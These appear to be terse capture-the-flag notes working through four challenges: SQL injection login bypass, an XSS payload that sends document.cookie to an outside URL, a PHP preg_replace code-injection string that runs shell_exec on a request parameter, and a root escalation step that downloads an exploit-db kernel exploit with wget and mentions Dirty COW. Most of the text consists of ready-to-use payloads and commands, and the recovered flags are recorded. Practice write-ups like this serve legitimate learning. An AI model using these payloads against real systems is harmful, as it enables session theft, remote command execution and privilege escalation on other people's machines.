* sql injection
  The query is probably 
  ~select * from xxx where (user='' AND password='');~
  ~(' or 1=1 or ')~ but ~(' or ''=')~ cannot because
  ~( user='' or ''='' and password = xxx )~. AND has higher precedence!
* XSS
  in the SQL injection before. 
  easily found that one column is 'user' and the other 'password'
  ~(') union select '<img id="test"> <script> var im=document.getElementById("test");im.src="http://localhost:8080/?cookie=" + document.cookie;</script>' as user,2 -- )~
  flag: xss_is_a_little_like_sqli_but_usually_a_lot_more_fun
* php
  read about ~preg_replace~. especially the ~e~ modifier
  guess they might be using ~preg_replace('/(.*)/e','hebrev("${1}")',my_input)~
  try give it ~[hebrew]'.phpinfo().'[/hebrew]~ failed.
  Hint from Cheng: have unescaped HTML as well.
  try ~[hebrew]<?php chr(97) ?>[/hebrew]~. Seems ~<?~ stuff is replaced by html comment.. 
  see that in PHP ~{${expr}}~ expr will be evaluated. Also! in php, a constant ~xxx~ will be evaluated as strings "xxx" if it is not defined
  try ~[hebrew]{${print(shell_exec($_GET[test]))}}[/hebrew]~
  then just pass it the ~test=xxx~ and php will happly execute ~xxx~ as shell command.
  flag:by_2050_php_may_get_rid_of_most_of_its_inherent_security_problems
* root privilege 
  search online. found this. https://www.exploit-db.com/exploits/37292/
  ~wget --help~ wget is present
  ~wget -O~ save as a different file
  Actual exploit: 
  ~wget https://www.exploit-db.com/download/37292 -O /tmp/ofc.c~
  try dirty cow
  
